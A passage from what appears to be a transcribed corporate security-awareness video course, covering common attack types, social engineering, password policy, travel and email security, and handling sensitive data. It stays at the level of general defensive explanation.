So say, staying with Windows 7, or a piece of software that's three generations old.
BYOD and IoT are relatively new. They've only been with us for 10 or 15 years
really, if you're speaking about bring your own device. They represent a risk
because these devices can connect wirelessly to an organization's network. And
security for mobile devices isn't always as secure as you need.
People bring their own devices, and companies let them connect because it's
convenient. Maybe it's cost effective, and it may make employees more efficient
because they don't have to be tethered to their desks to get work done. But these
devices could pose a real headache when they contain sketchy software or even
worse, actual Malware.
And the Internet of Things is even newer with devices that didn't previously
connect having connectivity now. Televisions and other electronic devices,
refrigerators even. And while there is a convenience factor to these devices, what
we're seeing is that the thousands of vendors who manufacture them don't always
or equally spend a lot of time thinking about security. And that poses a threat to
organizations that use them.
Types of Attacks
[Video description begins] Topic title: Types of Attacks. Your host for this session
is Jamie Campbell. [Video description ends]
In this video I'll discuss the common types of security attacks and how they pose a
risk to organizational information. Knowledge is power, that phrase has stood the
test of time and has serious implications in a world where information travels so
freely. We IT professionals always have to be aware of the next threat or kind of
attack because by understanding them, we can build defenses against them.
However, how much information do employees have about the attacks, that can
cripple a company or put it at great financial risk? People are generally aware of
some of the buzzwords like virus, but they don't intuitively understand how they're
packaged and delivered.
And that presents a risk for companies that don't properly train their personnel in
the things to look for. So let's dig into it. Virus, Trojan, and Worm, terms that most
people have heard. These three are the unholy triad of malware. Generally they are
small programs that can attach themselves to legitimate programs. Sometimes
they're stand alone processes that have been installed when a user clicks something
they shouldn't have. And some malware, like worms, are designed to spread
themselves across a computer network. Whatever their methodology their purpose
is always for malicious reasons. They could be used to spy quietly without the user
being aware of them. They can lock files and systems, encrypting them so a user
can't gain access. They can cause mayhem, destroying files or entire file systems,
and they can spread themselves exponentially to widen the damage.
Another common kind of attack and I use the word attack loosely because these
aren't necessarily actively enacted, are clickjacking and URL spoofing.
Clickjacking is a method used to hijack clicks thus the name on websites. It takes
advantage of vulnerabilities on a webpage to trick users into clicking invisible
links. URL spoofing creates what appears to be a legitimate page from a legitimate
company, except that they're not legitimate. Someone has gone to great lengths to
duplicate your bank's website, for example, and then tricks you into going there. Or
perhaps through a URL that looks, but is not exactly the spelling of the bank's
URL. Why do hackers use Clickjacking and URL Spoofing? There are several
possible reasons, they could want to earn money off advertising. So in the case
clickjacking, if you click on something that's actually an ad, they're getting the
money off of it, that's the best case scenario.
Often these methods are used to steal information or even infect the system. IP
Spoofing is another common kind of attack. In IP spoofing, an attacker hides their
actual IP address and tricks another system into thinking that the IP address is a
trusted one. So why use IP spoofing? Well, it can trick another system into
accepting it as trusted. Internal network IP addresses for example, have a certain
numerical format, and firewalls are trained to allow addresses using that format. If
you can trick a system by saying, hey, I'm one of you, I'm one of the team, then you
can begin to cause mayhem.
Phishing and spear phishing are a common method of phishing for information
about a potential target. Thus the name, except with P-H at the beginning instead of
an F. Commonly, this is done through email, but it has been used in social
engineering, and it's spread to SMS and other kinds of messaging systems now that
they're more prevalent. And spear phishing is a more sophisticated and therefore
dangerous form of phishing. It's more targeted often using personal information
about the recipient calling them by name, sending them a message as if it was a
known and trusted sender. Both kinds of phishing are used to get information about
a target. And that could range from someone pretending to be from IT looking to
confirm a password to obtaining information about account information, and more.
So they're very dangerous types of attacks.
Brute force attacks sounds scary because they can be. In a brute force attack a
computer throws processing power at a problem to attack it. In a brute force attack,
a computer keeps trying a password over and over again, guessing until the
computer gets it right. Now, this has become more of a problem because back in
the day, computers simply weren't fast enough to have the processing power to
process all the conceivable combinations. But computers have gotten exponentially
more powerful, and that's why you see greater emphasis on password complexity.
The man in the middle attack is where a hacker sits in between two parties, say for
example, two people sharing an email conversation.
[Video description begins] Why Man-in-the-Middle? [Video description ends]
The man in the middle attack could be used passively to gain sensitive information,
say about a client, a company, account information, you name it. Or can even be
used actively to modify the information being transmitted. So for example, the
hacker receives the email, modifies the information in it, and then sends it along to
the intended recipient.
Keyloggers are small pieces of malware that capture keyboard input. Their purpose
is of course pretty obvious. Someone can intercept account information, passwords,
and other sensitive information because every keystroke is silently captured and
transferred. Everyone knows spam, and no one loves it. But in my experience, most
people don't understand why much of the spam we get can be dangerous. Often it's
nonsensical and obvious in the scam it represents, but it can and does come in
many forms. Through emails, telephone, and messaging systems.
Spam can be dangerous in all kinds of ways. The obvious stuff, the prince looking
to get his money out of the country, I think most people are privy to. But spammers
have gotten more sophisticated often tricking people into clicking links, opening
attachments and things like that. But they can herald other things too. For example,
bogging down servers as the buildup to an attack happening elsewhere. Spam can
be pretty insidious and everyone in an organization needs to be spam literate.
[Video description begins] Spam can be very dangerous (with included links) or
deceptive (to draw focus away from something else) [Video description ends]
And then there's Denial-of-Service, DoS, and Distributed-Denial-of-Service,
DDoS. In this kind of attack, a system or systems keep accessing an IP address
thousands of times a second with the intent of choking the system. These attacks
can be pretty damaging and the most nefarious ones in history have cost the
targeted companies a great deal of money and downtime. Lost business and
upgrading equipment to mitigate future such attacks.
[Video description begins] DDoS is particularly dangerous because it comes from
multiple sources, usually unknowing bot computers, with a primary focus of
disabling a site. [Video description ends]
But DDoS in particular is problematic because of the distributed part, the first D. In
such attacks the hacker uses unsuspecting computers. Users who clicked the wrong
link or open the wrong attachment installing bot software, something called a
command and control or CNC bot. When the hijacker has a sufficient amount of
bots collectively known as a botnet, they can instruct the systems to bombard their
target.
Physical Security
[Video description begins] Topic title: Physical Security. Your host for this session
is Jamie Campbell. [Video description ends]
In this video, I'll discuss the role physical security plays in the protection of
corporate data. I think we all know practically speaking what physical security
means, but there's a bit of nuance when we talk about physical network security. It's
all the tangible things that protect a company's information, from locked doors to
the servers, to nodes on a network. That is all the PCs plugged into a network port
on a network. To network hubs throughout a building to the network ports
themselves.
And the physical footprint is large, spanning a great deal of area. Particularly if
you're talking about a company that has physical locations in different geographical
areas. It includes buildings, rooms inside those buildings, and warehouses and other
ancillary locations. But it goes deeper. It includes any tangible thing that can be
read or removed, printed documents, calendars and rolodexes and printed reports.
And yes, it could include any computer, connected device, access point, either
wired or wireless and servers.
So, why worry about it? We have locks, security guards, what's the big deal? Well,
first, locks can be broken if they're used at all. People tend to trust a visitor,
especially if they don't know that someone wandering down the hallway is a visitor.
One method of social engineering is to enter a secure building close behind
someone working there. They swipe their security pass, and the hacker enters along
with them. It has happened, the hacker can now wander around the building
looking for exploits. And as long as they're acting like they belong there, it's rare
that an employee would confront them. It's not always the case that employees
would confront them.
And here's the other thing. Locks are great when they're used. I like the adage that
we don't lock doors inside our houses. A few years ago, I heard a colleague
discussing the time they wandered into an empty office in their building. No one
was occupying the office and it was unlocked. But there on the floor was a wireless
router plugged into an Ethernet port, so plugged into the network. The problem was
that the company had a policy of securing the locations where wireless routers were
located, keeping them in locked cabinets.
My colleague unplugged the router and logged a security incident. Because it's
quite possible someone wandered into this empty office and plugged in to the
company network. And the other thing is passes and security badges. Does the
company have a policy to expire them? Passwords are usually set to expire, so too
should these keys, because these systems are all digital now, it's less of a problem.
But perhaps it's a small company with a rudimentary legacy system. If someone
retires or gets fired, their access should immediately be terminated but these cards
should be treated as another attack vector.
Social Engineering
[Video description begins] Topic title: Social Engineering. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how social engineering is conducted and how it can be
mitigated through corporate policy. Social engineering is the human side of
hacking. Hackers understand that people can often be tricked into giving up
information in person that they wouldn't give out online, even if that information is
seemingly innocent. Knowledge is power, and hackers use every bit of information
to find ways into secured systems, so they can access digital assets.
[Video description begins] Social engineering is the human side of hacking,
targeting individuals to either gain knowledge or confirm ways into an
organization's information and data [Video description ends]
In some very real ways, social engineering is as or in some case more dangerous
than online hacking. It's often overlooked as a topic for staff training. And because
every personality is different, different people are more susceptible to the often
sophisticated tactics used by would be attackers. There's some common social
engineering techniques used by hackers. By recognizing them, you can reduce the
risk that you'll fall under the spell of a social engineering campaign.
The first is dumpster diving, a term that refers to rummaging through an
organization's trash. It's not a new idea, and when companies don't properly dispose
of potentially sensitive information, it could very well end up in a dumpster and
ultimately in the hands of a hacker. Tailgating is the act of following an authorized
person into a secure place, so if you're smooth enough, you can pretend that you're
an employee with the person in front of you, using their credentials to enter a
secure space.
Phishing is the act of trying to get information from someone by pretending you're
someone else. It might seem like a bank or some other authority calling or emailing
for more information. Pretexting is similar to phishing but a bit different, because
now the hacker pretends to be a legitimate person that needs specific information.
One common tactic is to call an employee pretending to be from technical support.
People are surprisingly trusting if they think that they're speaking with a legitimate
person and this way hackers can gain valuable information. Also similar is quid pro
quo, where a hacker tries to find someone in an organization who has a real need.
For example, calling successive numbers pretending to be tech support.
[Video description begins] Why is social engineering dangerous? [Video
description ends]
Eventually, they'll come across someone who has an actual technical problem. By
establishing this connection, the hacker hopes that the person on the other line will
be more trusting and give up information. Now keep in mind that these are only a
portion of the various social engineering techniques used by hackers.
And this is all to say that social engineering is effective because people are more
trusting when it's out of context with what they are told to look for. Everyone
knows they shouldn't open an attachment or click a link from an untrusted source,
or at least they should.
But put the connection out of context with something as seemingly innocent as
talking to tech support on the phone, and they may open right up. Basically, a
stranger isn't necessarily a stranger when they are standing in your living room.
And while that isn't always the case, we tend to open up a bit more when we are in
a familiar setting.
The Importance of the Corporate Security Policy
[Video description begins] Topic title: The Importance of the Corporate Security
Policy. Your host for this session is Jamie Campbell. [Video description ends]
In this video I'll discuss the importance of corporate security policies and why they
should be strictly adhered to Corporate security policies are a funny thing. More
often than not, they're well designed, but how many people in an organization
actually read and understand them? Why do we need them, some may ask. Isn't it
just guidance for the people in IT, the ones who are there to protect the company's
information? Well, here's some facts.
First, a security policy is not a nice-to-have, it's a must-have. The legal and
financial ramifications of some sort of major security event can have a lasting
impact. And we need to be proactive, not just anticipating the worst but
understanding what the worst looks like, should it happen. And having a policy
means adhering to it, doing what it says. The problem is often that people may not
even read it.
New hires, for example, when they're onboarded, may get guidance on the policy.
They're asked to sign a document indicating that they read it. But that's not a
substitution for actually reading and understanding it. And it's difficult to keep
everyone informed when the policy evolves. And it may very well evolve, but that's
a challenge that must be overcome.
And don't cut corners with your policy, it's there to protect you. And the minute
someone asks for a favor, hey, I know we're not supposed to have this software, but
could you install it for me anyway. Then they've missed the entire point of the need
for a policy. So, here are some hard and fast facts about a corporate security policy.
Every employee must read and sign it.
You can make it part of the onboarding process for new hires and maybe it's not
enough to tell them to read it, explain why they need to know this. And what they
get doesn't have to be in depth, not the nitty-gritty stuff, they don't need to know
what goes on behind the scenes in IT in the event of a catastrophic power failure.
But they do need to know how it affects them and what they can do to mitigate the
risk. Certainly the need to be aware of compliance issues.
Countries and geographic regions have adopted new legislation in the information
age and everyone was affected when the EU's GDPR regulations went into effect in
May of 2018. In many cases, especially when we're dealing with private
information, we are legally bound to protect that information at our own peril. But
that's an organization-wide responsibility. It's not enough that your compliance
officer understands the liability risks. The people who handle the information have
to be aware of it. And a security policy must be monitored and audited on a
frequent basis to ensure that it's doing its job.
Password Protection Policies
[Video description begins] Topic title: Password Protection Policies. Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of password policies and why they should
be adhered to. Passwords, the bane of our existence. There was a time not long ago
when we had one easy-to-remember password for everything. And no one batted an
eyelash, because we didn't face the same risks that we do today. So why do we
need it? Why all the crazy characters? Well, here's one reason or ten.
These are the ten worst passwords used by people in 2018. And even a novice
hacker wannabe could crack these without breaking a sweat. It's kind of
reminiscent of Hollywood where someone is trying to break into a computer, and
after three tries they're in because they used your birth date. And I'm serious here.
Given the opportunity, most of us would choose something like one of these
because it makes life easier.
But here's why it's a big deal. Modern CPU speed has made brute force attacks
even scarier. There was a time 20 years ago, where if you chose eight characters of
randomized numbers, you were probably safe from the average attacker. That's no
longer the case. And look, social engineering, particularly phishing are a thing. We
can't ignore the sophistication of hackers, and making passwords easy to remember
just elevates the risk.
And we struggle because we're no longer in a single password world. I shutter to
admit the number of different passwords I have. But, because of password
complexity, they are not easy to remember. It's a challenge, and that's why
employee push back on complex passwords. But the cost of a breach can be
disastrous.
And then of course, there's what I call Sticky note syndrome. I cannot tell you the
number of times I've walked into someone's office and spied a yellow sticky note
pinned to the monitor. Not with just one password, but often multiple passwords.
That's a huge no-no, and IT admins understand that. A password policy must
incorporate strong language and strong follow-through on the physical storage of
passwords.
And you're not alone if you think this. Users don't necessarily care about security,
it's IT's job. It's my job to get work done, they want things uncomplicated. They
want to be unencumbered, and who can blame them? But that doesn't change the
need for a strong password policy without any loopholes. No exceptions, because
every exception puts your company at greater risk.
Why Never to Ask an Admin for Favors
[Video description begins] Topic title: Why Never to Ask an Admin for Favors.
Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll elaborate on the reasons why IT administrators need to protect an
organization by refusing to bend the rules. IT admins hear it all the time. You're
making my life more difficult.
[Video description begins] Why Shouldn't I Ask My Admin for a Favor? [Video
description ends]
It doesn't help that admins seem to be regarded as being on a power trip. They're
the ones in control. Honestly, it can be a thankless job at times but, it's the
responsibility of the admin to hold the keys to the kingdom and protect them at all
costs
So have you heard anyone say this to an admin? Maybe you've even said it, I hate
this password, I already have ten others, I have to memorize and you've given me
this garble of characters and numbers. And why does it have to change every 90
days? Can't you help a guy out? Look, no one likes to impose these kind of
restrictions, at least not without reason.
The fact is we have strong password policies in place to protect you, me, your
colleagues, the guys upstairs, the suppliers, the customers, everyone, the very
company itself. And IT has been given the awesome task of enforcing that policy
and they will not relent because they understand the seriousness of the risk. How
about this one? I need this app to do my job. It's really great. My friend over at
company ABC gets to use it so why not me? Well, ABC company probably needs
to reassess its security policy because we have reasons for disallowing errant
software that we know nothing about. It creates a new wrinkle adds to the attack
surface, and beyond that, if an admin were to cut you a break and install the
software on your laptop, what's to stop everyone else from asking for the same
favor?
See the problem? Why can't my phone access my network folder? Simply put, it's a
bad idea to give a mobile device like a phone or tablet that kind of access. There are
too many variables, specifically too many different mobile operating systems and
kinds of devices often with sketchy apps and poor or no security software.
Besides, mobile OSs don't really play well with traditional network protocols
probably because it's not really what they were designed for. Now, there are apps
that can provide that kind of access, but that in itself is a reason against the practice
because you won't find one from any of the big software providers.
And the capability to connect to a Windows or Linux network isn't built into these
devices. In the event that you need access to something, say a Word, Excel or a
PowerPoint file, web applications that can be accessed through a browser are the
best bet. And IT normally has some sort of Cloud provision that adds a layer of
security or something living inside the DMZ that will suffice for accessing your
files on the go.
[Video description begins] Facts about IT [Video description ends]
I'll leave you with this. IT is there to do a job, just like everyone else. They're
accountable, just like everyone else. But really what's important to know is, that
they're to protect you and others, not just the data or a nebulous concept like the
integrity of the network. They want to help, but they have policies and procedures
designed that way because they work. And they're bound by a code of ethics, no
less important to them than to another professional, a lawyer, a doctor, anyone like
that.
Anyone entrusted with the information that could be damaging were it to become
public. And on a very real note, an administrator could be fired for bending the
rules. In some instances they may even be subject to legal or fiduciary penalties for
breaking the rules. So it helps to remember that they're there for you, and they're
there for the company. And you're better off for having them there to protect and
enforce the rules.
Exercise: Describe Security Threats
[Video description begins] Topic title: Exercise - Describe Security Threats. Your
host for this session is Jamie Campbell. [Video description ends]
Now that you've learned about security threats it's time to put some of that
knowledge to work.
In this exercise you'll describe security threats. You'll explain what an attack
surface is. Explain what a demilitarized zone is. Explain threats, vulnerabilities, and
risks. Explain four top security threats. And explain what social engineering is. At
this point you can pause this video and answer these questions. When you're done,
resume the video to see how I would answer them. Okay, let's answer these
questions. It's okay if you didn't answer them exactly the same way.
First, explain what an attack surface is.Well, an attack surface is all the nodes,
users, devices, and entry points representing potential vulnerabilities of a software,
network, or business environment.
Next, explain what a demilitarized zone is. A demilitarized zone is a logical,
sometimes physically partitioned space between the entry point to a network, the
firewall, and the interior of a network or LAN. Its purpose is to provide a barrier
between the outside world and an organization's sensitive information.
Next, explain threats, vulnerabilities, and risks. Well, threats are potential sources
of danger. Vulnerabilities are potential sources of exploit. And risks are the
elements or assets that can be lost if threats meet vulnerabilities.
Next, explain four top security threats. Generally, the four top security threats to
organizations are malware, social engineering, unpatched software, and bring your
own device and the Internet of things.
Finally, explain what social engineering is. Social engineering can be characterized
as the human side of hacking. Where hackers target individuals to either gain
knowledge or find ways to access an organization's information and data.
I hope you found this exercise helpful.
An Executive's Guide to Security:
Protecting Your Information
This 13-video course explores data protection for businesses, including devices,
social media, and good governance through security principles, policies, and
programs. You will examine several types of security threats, the different types of
network attacks, the role physical security plays in the protection of corporate data,
and the human element of security threats. Next, learners examine the attack
surface, including the total combined nodes, users, devices, and any entry points of
software, a network, and a business environment. You will examine threats,
vulnerabilities, and risks, and learn the importance of network hardening. This
course uses real-world examples of several top security threats to businesses today,
including malware, social engineering, unpatched software, BYOD (bring your
own device), and IoT (Internet of things). You will examine clickjacking and URL
spoofing. Finally, this course discusses the legal and financial ramifications of a
major security breach, the importance of having a security policy, training
personnel, password protection, and managing a company's security.
Course Overview
[Video description begins] Topic title: Course Overview [Video description ends]
Hi, I’m Jamie Campbell. With almost 25 years as an IT consultant, marketing and
communications expert, and professional writer. I’m a technology enthusiast with a
passion for gadgets and a flair for problem solving. I've worked in the IT,
publishing, and automotive industries, and
[Video description begins] Your host is a Senior IT Consultant. [Video description
ends]
I'm also an accomplished web designer. Additionally, I've been a technology
instructor. I write for various tech blogs, and have authored and published four
novels. Breaches of company information are reported on a regular basis, and it has
never been more important that companies protect their information.
Organizational leaders must lead the charge, but it's often a challenge to understand
the risks and security principles designed to keep an organization safe. Companies
often mishandle data because personnel misunderstand practices, risks, and
implications.
In this course, I'll describe data protection practices, including security on the road,
email security, handling sensitive data, and best practices for sharing data. We'll
also explore challenges specific to devices and social media, and good governance
through security principles and programs.
Security on the Road
[Video description begins] Topic title: Security on the Road. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss best practices for working with and handling corporate
information while traveling.
[Video description begins] Screen title: Security on the Road [Video description
ends]
Working on the road is an absolute necessity, and there's no getting around it. But
how we work on the road is something that could use some work. For example,
consider this disturbing factoid from Kaspersky. 48% of senior managers and 43%
of mid-level managers use unsecure public access Wi-Fi networks to connect work
devices on the road. 44% of senior managers and 40% of mid-level managers use
Wi-Fi to transmit work emails with sensitive or confidential attachments. Security
professionals see numbers like this and it gives them fits. Because why?
Well, there are innumerable reasons. First, let's take a look at problem points for
accessing a network from the road. Just like inside an organizational network
there's an attack surface represented by remote work and several possible attack
vectors. Laptops, while incredibly useful, can be compromised if left alone or lost.
Wi-Fi access points aren't always secure, in fact quite the opposite.
Of course, mobile is its own risk category. Keys and security passes. No one thinks
about keys as being a security risk but if someone with malicious intent gets her
hand on a pass, it could be disastrous. The cloud also represents a risk. While it can
be very secure, more companies are moving their information to the cloud. Physical
documents, like confidential files and reports, can be stolen or destroyed. Your
device configuration could be an issue.
For example, a smartphone which hasn't been locked down with a PIN or
fingerprint. The Internet, of course, and web browsers, represent a risk if improper
pages and links are accessed. Removable media like USB drives are a problem
because they're small and easy to misplace. Security settings on mobile devices are
problematic, and it's not common practice to have legitimate malware software
installed on them. More companies are offering or requiring it for employees who
use their personal devices for business however, and I hope that practice continues.
And finally, Bluetooth, which has a limited range, still represents a security risk.
[Video description begins] 11 icons representing the major problem points on road
display: laptop, WiFi, mobile devices, keys and security passwords, the cloud,
physical documents, device configurations, Internet and web browsers, removable
media devices,security settings on mobile devices, and bluetooth. [Video
description ends]
So here’s why all that concerns IT administrators. Public Wi-Fi is often unsecured
and even unencrypted. It’s very convenient to stop into a coffee shop and check
your email over the shop’s network, but how certain are you that the purveyors set
up their security so your information would be protected?
A lack of mobile security or poor security software represents vulnerability. Autoconnect, also convenient, is not always a good idea. If you frequent a place it's nice
not to have to reconnect manually every time you go there, but it's easy to forget all
the different places we've connected to, and things change. Maybe some hacker got
wise and hit a wireless router that uses the same SSID as the coffee shop, it's not
that hard to do.
Again, Bluetooth, which connects devices to each other over a limited range, can
actually connect to devices at 100 meters away. It's a vulnerability, and I'd
recommend disabling Bluetooth until you need it. And then there's the speed of
business, which can lead to sloppiness. You get a text telling you that a report
absolutely has to be there within the hour. You're not going to be near a secure
connection in that time, the report contains very sensitive information. You're
sitting in a restaurant that has free Wi-Fi.
And because you've been there before, your device automatically connected to their
network which they haven't secured with encryption. That's a vulnerability. Other
travel troubles include lack of device locking, say automatic locking after a minute
or two of activity. My devices are set up not only to do that, but to routinely ask for
my pin in addition to my fingerprint say after phone's been reset. It's just a nice
additional feature that provides some peace of mind.
Passwords, especially easy ones, are fairly easy to device when someone is looking
over your shoulder. Lack of current software can be troublesome. Patching is an
ongoing process and it's not a bad idea to ensure that your devices are up to date
before you leave on a trip. The failure to back up your data in the event of a
catastrophic failure. And always a contentious one, thumb drives and other
removable media, because they're easy to lose and easy to remove and pocket, it's a
good idea to avoid using these to store sensitive information.
[Video description begins] Screen title: Security on the Road [Video description
ends]
When you're on the road and lose a device or suspect that it's been stolen, you
should treat it like a lost credit card. Report it immediately. If you suspect that it's
been stolen and have remote locking capability, a must for any device, then lock it
or wipe it. In the past, I was a road warrior moving from city to city five days a
week,
[Video description begins] Two bullet points display on the screen. Bullet 1, Lost or
stolen devices must be reported immediately. Bullet 2, Treat a misplaced device as
a misplaced credit card or wallet. [Video description ends]
so I know this as well as anyone. It's easy to feel the pressures of business,
especially on the road, but if you are a business traveler it's important to be aware
of the additional risks. It's my hope that organizations train people to be aware of
the risks of handling business information while they're on the move. It's a
precautionary measure that has no downside.
E-mail Security
[Video description begins] Topic title: E-mail Security. Your host for this session is
Jamie Campbell. [Video description ends]
In this video, I'll discuss the problems presented by organizational and personal
email, and best practices for working with email, including how to protect yourself
from spam.
[Video description begins] Screen title: E-mail Security [Video description ends]
Email is still very much a thing, particularly in the business world. So allow me to
indulge myself with what I call Campbell's law. Any information that ask for
personal information must be ignored. And here's why you can safely do that. I'll
use the example of a common spam campaign that occurs every year, particularly
around tax time.
You get an email that appears to be from the IRS stating that you've got a refund
coming to you, or worse, that they're taking you to court. Spam is designed to prey
on people's fears, and people do fall for it. But you've probably heard organizations
like the IRS, or banks, or other institutions telling you that they'll never contact you
via email asking for information or discussing personal matters.
Regardless of their policy, if you receive such an email and suspect it might be
legitimate, the appropriate response is to save a copy of the email, pick up the
phone, and dial the number of the institution. That way, you know you're dealing
with the actual organization. These are common spam techniques that hackers and
scammers use to trick you.
Spear phishing is used by getting some personal information on you upfront. Your
name, maybe some details about where you work, what you do, who your
colleagues are, that kind of thing. And then crafting an email just for you, so it's
more devious than general spam, like the IRS example.
The Nigerian 419 scam has been around for almost as long as email. Named after
the section of the Nigerian criminal code that deals with fraud, this is the scam
where someone pretending to be a prince or a rich person contacts you and asks for
help to get money out of the country. All you have to do is wire them some money
first as a show of good faith. And this one is fairly new, but as a security
professional, I must admit that I'm surprised it took this long.
Email address spoofing. You receive an email apparently from your own email
account with a message telling you that you've been hacked. The scammer may get
into a bit of detail about how they did it, but it's always sketchy, and the spelling
and grammar are poor. They give you a Bitcoin wallet address to send them a
payment. Here’s why I'm surprised that it took this long.
Spoofing an email address, setting an email account up to appear that it’s coming
from someone else, is ridiculously easy. I could show you how to do it in under a
minute. Someone finally got wise to it and decided to scam people. It’s been pretty
prevalent over the past year or so. And if you receive one of these emails, you can
safely ignore it.
And then there is impersonating the boss, which is a bit of a spear phishing
campaign and a bit of email spoofing. You see even email from the CEO, a senior
executive, an owner. Like email spoofing, this is known as impersonation fraud.
And employees should know what to look for so they can detect these scams.
Here are some common ways that hackers and scammers try to get you to infect
your organization's network. Spammers are phishing for a reply from you. Even if
you know it's spam and you feel like replying to ask the emailer not to contact you
again, don't. Some of these scammers want to validate that this is an email address
that you use perhaps so they can bombard you with more email.
Fake links appear to be one thing but are actually another. This technique is similar
to email spoofing in the sense that the hacker or scammer impersonates a legitimate
web address. If you know anything about HTML, you know that when you create a
web link, you can give it a different name than the URL. Useful because URLs can
get quite long. So you may see a link in an email that says www.irs.gov or
tripdub.abcbank.com. It looks legit, right? Well, don't click it.
A good email address reader should allow you to hover the mouse over the link,
and pop up the actual address. If your email reader doesn't have that capability,
simply right-click the link, and choose copy link in the fly out menu, then paste it
into a text editor. If it's anything but a legitimate link, then it's fraudulent.
Another trick attackers use is to create a link that looks like it's from a legitimate
company, but they add a domain extension to the end. So, for example, irs.gov.org
or abcbank.com.biz, something other than the actual site. The last extension is
always the one to look for because that's the one that determines where the link will
navigate to.
Chameleon attachments are attachments pretending to be something else. For
example, what looks like a PDF is actually an executable. And embedded images
can be dangerous because a hacker can exploit a system using a technique called
buffer overflow, where the image contains additional information, code, for
example. That gets executed because the email program receives more image data
than it expects. That's why email readers try to flag potentially dangerous emails by
disabling links and images, but they're not always successful.
Some common warning signs of a scam include the false sense of urgency, an
email telling you that you have to act now often with threats of legal action. Poor
spelling and grammar is a classic tell that an email isn't legitimate. If you receive an
email that's supposed to be a bank and it's laden with spelling errors, then you can
safely assume that it's spam.
Any email that asks for any personal information, I can't stress this enough. People
get lulled into a false sense of security, and they'll give up their account numbers,
passwords, mother's maiden name, you name it. You should always contact an
organization using the tried-and-true method of the telephone because these
organizations have published phone numbers.
And in lockstep with false sense of urgency, the threat, someone telling you that
your account will be disabled or locked, or saying that they have compromising
information. These are all classic tales of a spam scam. So it's worth reinforcing
everything I've said with some best practices. One, don't open attachments unless
you're absolutely certain that it's from a legitimate sender. Think before you click.
Become aware of the different techniques used for email spoofing keeping in mind
that spammers are coming up with the novel techniques all the time.
So it's more than understanding what they've done in the past. It's about
understanding what makes something legitimate. And once again, hover over a link
to see if it's a real deal. Furthermore, don't use your personal email for business
purposes. I'm sure that most people don't, but we all know that it's been done. Use
your malware scanner. People often rely on automatic scanning without realizing
that they can scan on demand. If it's an attachment and you're, say, 90% certain that
it's legit, right-click it.
The fly out menu should have options for your installed antivirus software,
something saying scan now. Treat your email passwords the same way you treat
every other password. That is, make them strong, and keep them secure. And look,
it's not a bad idea to see if you've been pwned. If you're not familiar with the term,
it means, I own you.
And while it originated something from online gaming, it's now understood to
mean you've been compromised or hacked. If you do a web search of the term
pwned, you'll find a couple of links that allow you to enter your email address. It
checks your email address against known data breaches to determine if your
information was caught up in a breach. Now if you have been pwned, you should
locate the site where you were compromised to change your password with that site
and determine what kind of information was compromised.
Finally, don't enable macros, which are small bits of code that became popular in
Office software. Years ago, around the late 90s I believe, it was discovered that
hackers could inject malicious code into Office documents like a spreadsheet or
word processing document. Vendors like Microsoft responded quickly to disable
macros by default, but the problem still persists. If you use a modern version of
Office and receive an Excel or Word document by email, you probably know that
you can't open it without disabling the block that Outlook puts on it. That's to
prevent you from opening suspicious, probably macro-enabled documents.
Again, learn how to recognize scams, the techniques that scammers use.
Understand how URLs work, how they can be spoofed. And, ultimately, protect
your email addresses. It's inevitable that you have to use your business email in
certain situations, but I have several different addresses that I use for specific
purposes to avoid a massive amount of spam in my inbox.
How to Handle Sensitive Data
[Video description begins] Topic title: How to Handle Sensitive Data. Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the proper ways to handle sensitive company information,
including the differences between working with online data and physical media.
Handling sensitive data is a responsibility but it's not always clear what constitutes
sensitive data. So let's spend some time understanding what it means and how you
should handle it.
Generally, sensitive data contains company information. So information about
people, procedures, processes, anything that might not be public knowledge. Client
information, of course this is an important one because clients won't be very
forgiving if some piece of important information gets out into the wild. Financial
information, sales, revenues, anything that pertains to an organization's financial
matters. And personal information about you, a supplier, or a customer.
[Video description begins] Screen title: How to Handle Sensitive Data [Video
description ends]
Generally your organization will define what constitutes sensitive information. But
if you're uncertain, the best rule of thumb is to regard any information that you
receive as sensitive until you know otherwise. To illustrate the importance of how
information should be handled,
[Video description begins] Screen title: It's Not Always About the Network [Video
description ends]
I'll give you an example of how not to handle data. In 2008, a USB drive that was
infected with malware was inadvertently inserted into a laptop at a US military base
in the Middle East. The result was what's been called the most significant breach of
US defense networks in history. Now, in that scenario, we don't know why that
USB drive was infected or what kind of information it contained. But putting a
removable disk in a computer is something we do all the time and it can have
consequences. So how do you protect sensitive data?
First, encryption is a great way to do it. And everyone handling the most sensitive
of data should use encryption where possible. OSs even have built in encryption
that you can take advantage of. Store your information on lockable devices. So on a
secure phone or tablet for example that has strong locking features like biometrics.
Never share information over a public network.
What's a public network? When you sit down at a coffee shop and log in to their
free WiFi, that's a public network. When you check into a hotel room and plug in
their Ethernet cable to your laptop. That's a public network. Anything that's not
your own network should be regarded as public. And that leads to my next point.
Only share on secured networks. Large companies might use a VPN, which is a
secure connection to the network that uses an encryption technique known as
tunneling. That's a preferred method.
And never store your sensitive information on removable devices because they're
easily lost or misplaced. One example is a hard drive, not necessarily a removable
device, but this does illustrate why owned by the National Archive and Records
Administration. In 2008, this hard drive stopped working. It was sent to an outside
company which determined the drive couldn't be fixed.
Apparently, the drive was sent for destruction but nobody can confirm whether this
actually happened. And the drive contained personal information about 75 million
US veterans, including Social Security numbers. An investigation ensued and the
administration took a black eye. So protecting your information and the
information of others is paramount to IT security.
When and What to Share
[Video description begins] Topic title: When and What to Share. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss sharing data with colleagues, customers, and the public.
[Video description begins] Screen title: When and What to Share Sensitive
Data? [Video description ends]
IT admins are sometimes like protective mother bears, and they would also like it if
you never shared information, because they usually bear the brunt of the fallout,
and they understand the myriad of risks. But it's not practical and they know it, so
when and how should you share data?
First, what should you share? Physical documents? Yes and no. Removable media,
yes and no. Digital files, and I'm sure you figured it already, but yes and no. Look,
this is not always easy to determine but there are instances when you do need to
share using any of these methods. It's more important that you understand how to
share on a case-by-case basis because there's a case to be made for each of these
methods.
[Video description begins] Icons for physical documents, removable media, and
digital files display. Each icon is followed by yes and no options to show the
choices we face- whether or not to share. [Video description ends]
In reality, you have to conduct business and that means sharing information that if
compromised, if it gets out in the wild, it could result in serious business, financial
or legal ramifications. So rather than saying, I can't share that, you really need to
ask yourself should I share that?
[Video description begins] Screen title: When to Share Sensitive Data [Video
description ends]
There are reasons to share sensitive information. You trust the source of the
information, that is, where you received it. You trust the delivery method, whether
